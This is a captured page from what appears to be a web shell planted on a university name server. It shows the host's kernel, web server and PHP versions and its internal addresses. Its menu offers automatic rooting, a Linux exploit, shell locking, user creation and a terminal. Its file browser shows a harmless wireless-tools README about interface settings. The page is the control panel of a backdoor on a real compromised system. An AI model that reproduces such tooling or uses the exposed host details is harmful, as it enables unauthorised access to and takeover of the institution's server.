Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
wireless-tools /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.Debian.gz
1.06
KB
-rw-r--r--
copyright
1.74
KB
-rw-r--r--
DISTRIBUTIONS.txt.gz
5.37
KB
-rw-r--r--
HOTPLUG-UDEV.txt.gz
17.93
KB
-rw-r--r--
PCMCIA.txt.gz
2.16
KB
-rw-r--r--
README.Debian
1.6
KB
-rw-r--r--
README.gz
2.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.Debian
/etc/network/interfaces ----------------------- You can now add extra statements to the iface sections of the files in /etc/network/interfaces that are specific for wireless interfaces. They are of the form: wireless-<function> <value> After the interface is brought up, such a statement will result in the execution of the following command: iwconfig <interface> <function> <value> Note that there may be some drivers that only accept wireless configuration if the interface is down. In that case, configuration from /etc/network/interfaces may fail. If you bring the interface down, then for each wireless-<function> statement given it will execute a corresponding iwconfig command that reverts that function back to sane defaults. For example, if you specified a wireless-key, if you run ifdown it will set the wireless key to "off". If you want to specify a nick, nwid or essid with spaces in them, you must not surround them with quotes. To specify multiple keys the following statements are also available: wireless-key<number> <key> wireless-defaultkey <number> wireless-keymode restricted|open To fine-tune power management the following statements are also available: wireless-powerperiod <period> wireless-powertimeout <timeout> Example: iface eth0 inet static address 192.168.1.2 network 192.168.1.0 netmask 255.255.255.0 broadcast 192.168.1.255 wireless-essid Home wireless-mode ad-hoc Example of multiple keys: wireless-key1 0123-4567-89ab-cdef wireless-key2 12345678 wireless-key3 s:password wireless-defaultkey 2 wireless-keymode open
Close